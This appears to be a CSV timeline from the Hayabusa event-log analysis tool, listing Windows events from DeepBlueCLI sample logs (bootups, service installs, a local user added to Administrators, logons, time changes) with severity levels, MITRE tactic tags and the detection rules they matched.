Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath 2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:16:27.000 +09:00,37L4247D28-05,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 01:17:29.468 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:17:32.328 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:17:38.218 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:17:40.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:17:41.421 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:17:43.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:17:44.875 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:18:11.000 +09:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:21:28.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx 2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx 2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:29:39.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:30:56.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:32:13.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:33:15.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:46:48.772 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 02:48:35.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:50:26.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 02:55:52.082 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:03:23.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:04:53.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:05:33.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:06:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:18:24.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:19:51.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:21:52.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:23:07.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:35:55.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:36:43.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:44:06.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:45:59.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:54:08.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 04:55:00.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 04:55:02.000 